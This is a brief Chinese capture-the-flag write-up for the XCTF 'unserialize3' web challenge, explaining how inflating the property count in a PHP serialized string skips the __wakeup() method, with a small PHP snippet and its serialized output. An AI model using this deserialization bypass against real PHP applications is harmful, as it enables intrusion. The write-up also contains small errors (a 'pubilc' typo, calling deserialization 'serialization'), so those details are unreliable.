跳过__wakeup()魔法函数

__wakeup()：将在序列化之后立即被调用。

漏洞原理：当反序列化字符串中，表示属性个数的值大于其真实值，则跳过__wakeup()执行。

 

---

 

参考题目：xctf-unserialize3

https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4821&page=1

 

对于该题，先可以看到类xctf中有flag变量，并调用了__wakeup()，则考虑实例化xctf类并将其变量序列化。并猜测意图为将序列化结果输入在?code=后进行POST请求。

 

<?php
class xctf{
public $flag = '111';
pubilc function __wakeup(){
exit('bad requests');
}
}
 
$a = new xctf();
echo(serialize($a));
?>
 
// 序列化输出结果为：
// O:4:"xctf":1:{s:4:"flag";s:3:"111";}

 

正常结果输入时，会执行__wakeup()，从而输出'bad requests'，并退出脚本，因此利用漏洞绕过__wakeup()。

 

将序列化字符串中代表变量个数的数字改为大于其真实值的数字，并进行POST请求，得到结果。

得到结果。